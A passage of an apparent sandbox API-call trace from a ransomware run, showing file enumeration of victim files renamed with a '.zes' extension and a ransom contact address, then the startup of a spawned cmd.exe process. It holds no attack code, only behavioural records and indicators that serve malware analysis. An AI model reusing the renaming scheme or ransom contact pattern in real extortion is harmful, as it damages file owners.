lpFindFileData=0x433fa98 | out: lpFindFileData=0x433fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcdc7610, ftCreationTime.dwHighDateTime=0x1d5d908, ftLastAccessTime.dwLowDateTime=0xafd07720, ftLastAccessTime.dwHighDateTime=0x1d5e319, ftLastWriteTime.dwLowDateTime=0xa7dce3d0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x4044, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="wMPhdEkF8ANxaAg_NJ.mp3.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="WMPHDE~1.ZES")) returned 1 [0153.235] FindNextFileW (in: hFindFile=0x3f435c8, lpFindFileData=0x433fa98 | out: lpFindFileData=0x433fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcdc7610, ftCreationTime.dwHighDateTime=0x1d5d908, ftLastAccessTime.dwLowDateTime=0xafd07720, ftLastAccessTime.dwHighDateTime=0x1d5e319, ftLastWriteTime.dwLowDateTime=0xa7dce3d0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x4044, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="wMPhdEkF8ANxaAg_NJ.mp3.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="WMPHDE~1.ZES")) returned 0 [0153.235] FindClose (in: hFindFile=0x3f435c8 | out: hFindFile=0x3f435c8) returned 1 [0153.235] GetProcessHeap () returned 0x520000 [0153.235] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x553158 | out: hHeap=0x520000) returned 1 [0153.235] WaitForSingleObject (hHandle=0x5fc, dwMilliseconds=0x0) returned 0x102 [0153.235] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36fb1a60, ftCreationTime.dwHighDateTime=0x1d5de7a, ftLastAccessTime.dwLowDateTime=0x78a29120, ftLastAccessTime.dwHighDateTime=0x1d5e4ae, ftLastWriteTime.dwLowDateTime=0xa7df4530, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x17f14, dwReserved0=0x0, dwReserved1=0xffff, cFileName="ybEXHNZftujEdotm.mp4.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="YBEXHN~1.ZES")) returned 1 [0153.235] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69abf600, ftCreationTime.dwHighDateTime=0x1d66ceb, ftLastAccessTime.dwLowDateTime=0x6a448c80, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0x23529900, ftLastWriteTime.dwHighDateTime=0x1d66ce3, nFileSizeHigh=0x0, nFileSizeLow=0xaa00, dwReserved0=0x0, dwReserved1=0xffff, cFileName="zes.exe", cAlternateFileName="")) returned 1 [0153.235] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d2096e0, ftCreationTime.dwHighDateTime=0x1d5e817, ftLastAccessTime.dwLowDateTime=0xb87a3260, ftLastAccessTime.dwHighDateTime=0x1d5e6db, ftLastWriteTime.dwLowDateTime=0xa7df4530, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x109f4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="zgyGh8GT0arDFn7.mkv.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="ZGYGH8~1.ZES")) returned 1 [0153.235] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdfbb7e70, ftCreationTime.dwHighDateTime=0x1d5e5d1, ftLastAccessTime.dwLowDateTime=0x2ed92ca0, ftLastAccessTime.dwHighDateTime=0x1d5e122, ftLastWriteTime.dwLowDateTime=0xa7e8cab0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x2d74, dwReserved0=0x0, dwReserved1=0xffff, cFileName="ZJyWQae78.bmp.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="ZJYWQA~1.ZES")) returned 1 [0153.235] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdfbb7e70, ftCreationTime.dwHighDateTime=0x1d5e5d1, ftLastAccessTime.dwLowDateTime=0x2ed92ca0, ftLastAccessTime.dwHighDateTime=0x1d5e122, ftLastWriteTime.dwLowDateTime=0xa7e8cab0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x2d74, dwReserved0=0x0, dwReserved1=0xffff, cFileName="ZJyWQae78.bmp.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="ZJYWQA~1.ZES")) returned 0 [0153.235] FindClose (in: hFindFile=0x3f43508 | out: hFindFile=0x3f43508) returned 1 [0153.235] GetProcessHeap () returned 0x520000 [0153.235] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f1b378 | out: hHeap=0x520000) returned 1 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x34a94000" os_pid = "0x5dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x634" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0x248 [0067.313] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fb50 | out: lpSystemTimeAsFileTime=0x26fb50*(dwLowDateTime=0x876703b0, dwHighDateTime=0x1d66ceb)) [0067.313] GetCurrentProcessId () returned 0x5dc [0067.313] GetCurrentThreadId () returned 0x248 [0067.313] GetTickCount () returned 0x11485a4 [0067.313] QueryPerformanceCounter (in: lpPerformanceCount=0x26fb58 | out: lpPerformanceCount=0x26fb58*=18741172537) returned 1 [0067.315] GetModuleHandleW (lpModuleName=0x0) returned 0x4a900000 [0067.315] __set_app_type (_Type=0x1) [0067.315] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a927810) returned 0x0 [0067.315] __getmainargs (in: _Argc=0x4a94a608, _Argv=0x4a94a618, _Env=0x4a94a610, _DoWildCard=0, _StartInfo=0x4a92e0f4 | out: _Argc=0x4a94a608, _Argv=0x4a94a618, _Env=0x4a94a610) returned 0 [0067.316] GetCurrentThreadId () returned 0x248 [0067.316] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x248) returned 0x3c [0067.317] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0067.317] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0067.317] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0067.317] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0067.317] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fae8 | out: phkResult=0x26fae8*=0x0) returned 0x2 [0067.318] VirtualQuery (in: lpAddress=0x26fad0, lpBuffer=0x26fa50, dwLength=0x30 | out: lpBuffer=0x26fa50*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.318] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fa50, dwLength=0x30 | out: lpBuffer=0x26fa50*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.318] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fa50, dwLength=0x30 | out: lpBuffer=0x26fa50*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.318] VirtualQuery (in: lpAddress=0x174000, lpBuffer=0x26fa50, dwLength=0x30 | out: lpBuffer=0x26fa50*(BaseAddress=0x174000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.318] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fa50, dwLength=0x30 | out: lpBuffer=0x26fa50*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xf0000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0067.318] GetConsoleOutputCP () returned 0x1b5 [0067.318] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a93bfe0 | out: lpCPInfo=0x4a93bfe0) returned 1 [0067.318] SetConsoleCtrlHandler (HandlerRoutine=0x4a923184, Add=1) returned 1 [0067.319] _get_osfhandle (_FileHandle=1) returned 0x12c [0067.319] SetConsoleMode (hConsoleHandle=0x12c, dwMode=0x0) returned 0 [0067.319] _get_osfhandle (_FileHandle=1) returned 0x12c [0067.319] GetConsoleMode (in: hConsoleHandle=0x12c, lpMode=0x4a92e194 | out: lpMode=0x4a92e194) returned 0 [0067.319] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.319] GetConsoleMode (in: hConsoleHandle=0x120, lpMode=0x4a92e198 | out: lpMode=0x4a92e198) returned 0 [0067.319] GetEnvironmentStringsW () returned 0x478a60* [0067.320] GetProcessHeap () returned 0x460000 [0067.320] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xa7c) returned 0x4794f0 [0067.320] FreeEnvironmentStringsW (penv=0x478a60) returned 1 [0067.320] GetProcessHeap () returned 0x460000 [0067.320] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x8) returned 0x4788e0 [0067.320] GetEnvironmentStringsW () returned 0x478a60* [0067.320] GetProcessHeap () returned 0x460000 [0067.320] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xa7c) returned 0x479f80 [0067.320] FreeEnvironmentStringsW (penv=0x478a60) returned 1 [0067.320] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e9a8 | out: phkResult=0x26e9a8*=0x44) returned 0x0 [0067.321] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e9a0, lpData=0x26e9c0, lpcbData=0x26e9a4*=0x1000 | out: lpType=0x26e9a0*=0x0, lpData=0x26e9c0*=0x18, lpcbData=0x26e9a4*=0x1000) returned 0x2 [0067.321] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e9a0, lpData=0x26e9c0, lpcbData=0x26e9a4*=0x1000 | out: lpType=0x26e9a0*=0x4, lpData=0x26e9c0*=0x1, lpcbData=0x26e9a4*=0x4) returned 0x0 [0067.321] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e9a0, lpData=0x26e9c0, lpcbData=0x26e9a4*=0x1000 | out: lpType=0x26e9a0*=0x0, lpData=0x26e9c0*=0x1, lpcbData=0x26e9a4*=0x1000) returned 0x2 [0067.321] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e9a0, lpData=0x26e9c0, lpcbData=0x26e9a4*=0x1000 | out: lpType=0x26e9a0*=0x4, lpData=0x26e9c0*=0x0, lpcbData=0x26e9a4*=0x4) returned 0x0 [0067.321] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e9a0, lpData=0x26e9c0, lpcbData=0x26e9a4*=0x1000 | out: lpType=0x26e9a0*=0x4, lpData=0x26e9c0*=0x40, lpcbData=0x26e9a4*=0x4) returned 0x0 [0067.321] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e9a0, lpData=0x26e9c0, lpcbData=0x26e9a4*=0x1000 | out: lpType=0x26e9a0*=0x4, lpData=0x26e9c0*=0x40, lpcbData=0x26e9a4*=0x4) returned 0x0 [0067.321] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e9a0, lpData=0x26e9c0, lpcbData=0x26e9a4*=0x1000 | out: lpType=0x26e9a0*=0x0, lpData=0x26e9c0*=0x40, lpcbData=0x26e9a4*=0x1000) returned 0x2 [0067.321] RegCloseKey (hKey=0x44) returned 0x0 [0067.321] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e9a8 | out: phkResult=0x26e9a8*=0x44) returned 0x0 [0067.321] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e9a0, lpData=0x26e9c0, lpcbData=0x26e9a4*=0x1000 | out: lpType=0x26e9a0*=0x0, lpData=0x26e9c0*=0x40, lpcbData=0x26e9a4*=0x1000) returned 0x2 [0067.321] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e9a0, lpData=0x26e9c0, lpcbData=0x26e9a4*=0x1000 | out: lpType=0x26e9a0*=0x4, lpData=0x26e9c0*=0x1, lpcbData=0x26e9a4*=0x4) returned 0x0 [0067.322] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e9a0, lpData=0x26e9c0, lpcbData=0x26e9a4*=0x1000 | out: lpType=0x26e9a0*=0x0, lpData=0x26e9c0*=0x1, lpcbData=0x26e9a4*=0x1000) returned 0x2 [0067.322] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e9a0, lpData=0x26e9c0, lpcbData=0x26e9a4*=0x1000 | out: lpType=0x26e9a0*=0x4, lpData=0x26e9c0*=0x0, lpcbData=0x26e9a4*=0x4) returned 0x0 [0067.322] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e9a0, lpData=0x26e9c0, lpcbData=0x26e9a4*=0x1000 | out: lpType=0x26e9a0*=0x4, lpData=0x26e9c0*=0x9, lpcbData=0x26e9a4*=0x4) returned 0x0 [0067.322] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e9a0, lpData=0x26e9c0, lpcbData=0x26e9a4*=0x1000 | out: lpType=0x26e9a0*=0x4, lpData=0x26e9c0*=0x9, lpcbData=0x26e9a4*=0x4) returned 0x0 [0067.322] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e9a0, lpData=0x26e9c0, lpcbData=0x26e9a4*=0x1000 | out: lpType=0x26e9a0*=0x0, lpData=0x26e9c0*=0x9, lpcbData=0x26e9a4*=0x1000) returned 0x2 [0067.322] RegCloseKey (hKey=0x44) returned 0x0 [0067.322] time (in: timer=0x0 | out: timer=0x0) returned 0x5f2da24d [0067.322] srand (_Seed=0x5f2da24d) [0067.322] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0067.322] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0067.323] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a93c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.323] GetProcessHeap () returned 0x460000 [0067.323] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x218) returned 0x47aa10 [0067.323] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x47aa20, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0067.323] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a92f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0067.323] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a92f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0067.323] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a92f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.323] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0067.323] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0067.323] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0067.324] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0067.324] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0067.324] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0067.324] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0067.324] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0067.324] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0067.324] GetProcessHeap () returned 0x460000 [0067.324] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4794f0 | out: hHeap=0x460000) returned 1 [0067.324] GetEnvironmentStringsW () returned 0x478a60* [0067.324] GetProcessHeap () returned 0x460000 [0067.324] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xa94) returned 0x47ac30 [0067.324] FreeEnvironmentStringsW (penv=0x478a60) returned 1 [0067.324] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a92f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0067.324] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a92f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.324] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0067.324] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0067.325] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0067.325] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0067.325] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0067.325] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0067.325] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0067.325] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0067.325] GetProcessHeap () returned 0x460000 [0067.325] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x5c) returned 0x47b6d0 [0067.325] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f7b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.325] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x26f7b0, lpFilePart=0x26f790 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x26f790*="Desktop") returned 0x25 [0067.325] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0067.325] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f4c0 | out: lpFindFileData=0x26f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x47b740 [0067.326] FindClose (in: hFindFile=0x47b740 | out: hFindFile=0x47b740) returned 1 [0067.326] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x26f4c0 | out: lpFindFileData=0x26f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x47b740 [0067.326] FindClose (in: hFindFile=0x47b740 | out: hFindFile=0x47b740) returned 1 [0067.326] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0067.326] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x26f4c0 | out: lpFindFileData=0x26f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7d60e200, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0x7d60e200, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x47b740 [0067.326] FindClose (in: hFindFile=0x47b740 | out: hFindFile=0x47b740) returned 1 [0067.327] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0067.327] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0067.327] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0067.327] GetProcessHeap () returned 0x460000 [0067.327] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47ac30 | out: hHeap=0x460000) returned 1 [0067.327] GetEnvironmentStringsW () returned 0x47b740* [0067.327] GetProcessHeap () returned 0x460000 [0067.327] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xae8) returned 0x47c230 [0067.327] FreeEnvironmentStringsW (penv=0x47b740) returned 1 [0067.327] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a93c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.327] GetProcessHeap () returned 0x460000 [0067.327] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47b6d0 | out: hHeap=0x460000) returned 1 [0067.327] GetProcessHeap () returned 0x460000 [0067.327] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x4016) returned 0x47cd20 [0067.328] GetProcessHeap () returned 0x460000 [0067.328] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47cd20 | out: hHeap=0x460000) returned 1 [0067.328] GetConsoleOutputCP () returned 0x1b5 [0067.328] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a93bfe0 | out: lpCPInfo=0x4a93bfe0) returned 1 [0067.328] GetUserDefaultLCID () returned 0x409 [0067.329] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a937b50, cchData=8 | out: lpLCData=":") returned 2 [0067.329] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f8c0, cchData=128 | out: lpLCData="0") returned 2 [0067.329] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f8c0, cchData=128 | out: lpLCData="0") returned 2 [0067.329] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f8c0, cchData=128 | out: lpLCData="1") returned 2 [0067.329] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a94a740, cchData=8 | out: lpLCData="/") returned 2 [0067.329] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a94a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0067.329] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a94a460, cchData=32 | out: lpLCData="Tue") returned 4 [0067.329] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a94a420, cchData=32 | out: lpLCData="Wed") returned 4 [0067.329] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a94a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0067.329] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a94a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0067.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a94a360, cchData=32 | out: lpLCData="Sat") returned 4 [0067.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a94a700, cchData=32 | out: lpLCData="Sun") returned 4 [0067.330] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a937b40, cchData=8 | out: lpLCData=".") returned 2 [0067.330] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a94a4e0, cchData=8 | out: lpLCData=",") returned 2 [0067.330] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0067.331] GetProcessHeap () returned 0x460000 [0067.331] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x20c) returned 0x4795c0 [0067.331] GetConsoleTitleW (in: lpConsoleTitle=0x4795c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0067.331] _get_osfhandle (_FileHandle=1) returned 0x12c [0067.331] GetFileType (hFile=0x12c) returned 0x3 [0067.332] BrandingFormatString () returned 0x4797e0 [0067.339] GetVersion () returned 0x1db10106 [0067.339] _vsnwprintf (in: _Buffer=0x26fa30, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x26f9c8 | out: _Buffer="6.1.7601") returned 8 [0067.339] _get_osfhandle (_FileHandle=1) returned 0x12c [0067.339] GetFileType (hFile=0x12c) returned 0x3 [0067.339] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a946340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0067.339] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a946340, nSize=0x2000, Arguments=0x26f9d0 | out: lpBuffer="Microsoft Windows [Version 6.1.7601]") returned 0x24 [0067.339] _get_osfhandle (_FileHandle=1) returned 0x12c [0067.339] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 6.1.7601]", cchWideChar=-1, lpMultiByteStr=0x4a93c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 6.1.7601]", lpUsedDefaultChar=0x0) returned 37 [0067.339] WriteFile (in: hFile=0x12c, lpBuffer=0x4a93c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x26f958, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesWritten=0x26f958*=0x24, lpOverlapped=0x0) returned 1 [0067.340] _vsnwprintf (in: _Buffer=0x4a946340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26f9f8 | out: _Buffer="\r\n") returned 2 [0067.340] _get_osfhandle (_FileHandle=1) 